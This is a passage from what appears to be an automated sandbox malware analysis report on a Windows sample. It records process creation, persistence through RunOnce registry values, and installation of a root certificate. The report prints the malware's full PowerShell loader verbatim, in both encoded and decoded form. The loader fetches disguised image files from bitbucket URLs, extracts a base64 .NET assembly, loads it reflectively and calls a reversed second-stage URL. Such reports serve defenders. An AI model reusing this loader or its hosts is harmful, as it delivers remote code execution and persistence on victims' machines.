#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcub
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la'
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
        Source: 0XVZC3kfwL.exeStatic PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF681C21D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4ADF0DD0 pushad ; retf 5_2_00007FFB4ADF0E0D

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C215F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF681C215F4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
